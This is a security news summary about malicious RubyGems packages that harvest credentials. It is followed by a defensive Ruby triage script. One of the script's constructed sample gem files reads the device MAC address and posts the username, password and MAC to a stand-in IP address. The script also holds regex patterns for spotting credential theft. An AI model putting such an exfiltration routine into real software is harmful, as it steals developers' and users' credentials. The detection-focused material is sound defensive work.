Malicious Ruby gems containing credential-stealing code have been downloaded over 275,000 times since March 2023, primarily targeting developers who use popular automation and social media tools. The gems carry phishing code that harvests user credentials and device information, posing a significant supply chain risk to the RubyGems ecosystem. #RubyGems #CredentialTheft
Key points
- Sixty malicious Ruby gems have been identified, targeting mainly South Korean users.
- The perpetrators used multiple aliases and accounts to publish these harmful packages on RubyGems.org.
- The gems pose as legitimate tools such as WordPress automators, Telegram bots, and SEO tools while carrying malicious code.
- The malicious code exfiltrates usernames, passwords, device MAC addresses, and tracks campaign data.
- Developers are advised to scrutinize open-source libraries and verify publisher credibility to prevent supply chain attacks.
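As an added example (not code from the report or from any of the gems it describes), the script below shows one way a developer could triage gem sources for the behaviours listed above: credential handling, device MAC collection, campaign tracking, and outbound HTTP posting. All gem file contents, paths and addresses are constructed samples.

```ruby
# Constructed sample gem sources: one benign, one legitimate-but-noisy, one matching
# the reported behaviour. Single-quoted heredocs keep "#{...}" literal (no interpolation).
SAMPLE_GEM_FILES = {
  "seo_rank/lib/rank.rb" => <<~'RUBY',
    require "net/http"
    def rank(keyword)
      Net::HTTP.get(URI("https://example.invalid/rank?q=#{keyword}"))
    end
  RUBY
  "tg_notifier/lib/send.rb" => <<~'RUBY',
    require "net/http"
    def notify(token, text)
      Net::HTTP.post_form(URI("https://api.telegram.org/bot#{token}/sendMessage"), text: text)
    end
  RUBY
  "wp_automator/lib/login.rb" => <<~'RUBY',
    require "net/http"
    def login(user, password)
      mac = File.read("/sys/class/net/eth0/address").strip
      data = { u: user, p: password, mac: mac, campaign: "c01" }
      Net::HTTP.post_form(URI("http://198.51.100.7/collect"), data)
    end
  RUBY
}.freeze

# Indicator categories taken from the reported behaviour; patterns are hypothetical heuristics.
INDICATORS = {
  credentials: /\b(password|passwd|credential|token)\b/i,
  device_id:   /\b(mac_?addr|macaddr|getifaddrs)\b|\/sys\/class\/net\/\w+\/address/i,
  tracking:    /\bcampaign\b/i,
  exfil:       /Net::HTTP\.post|HTTParty\.post|TCPSocket\.new/i,
}.freeze

# Returns the indicator categories present in one source file, in INDICATORS order.
def classify(source)
  INDICATORS.select { |_, re| source.match?(re) }.keys
end

# Files hitting at least `threshold` categories are review candidates, not verdicts:
# legitimate code (the Telegram notifier) also handles a token and posts to an API.
def suspicious_gems(files, threshold: 2)
  files.each_with_object({}) do |(path, src), out|
    hits = classify(src)
    out[path] = hits if hits.size >= threshold
  end
end

if __FILE__ == $PROGRAM_NAME
  suspicious_gems(SAMPLE_GEM_FILES).each { |path, hits| puts "#{path}: #{hits.join(', ')}" }
end
```

Raising the threshold to 3 drops the notifier and leaves only the file that also reads a MAC address and tags a campaign; in practice the flagged files still need a human to read them.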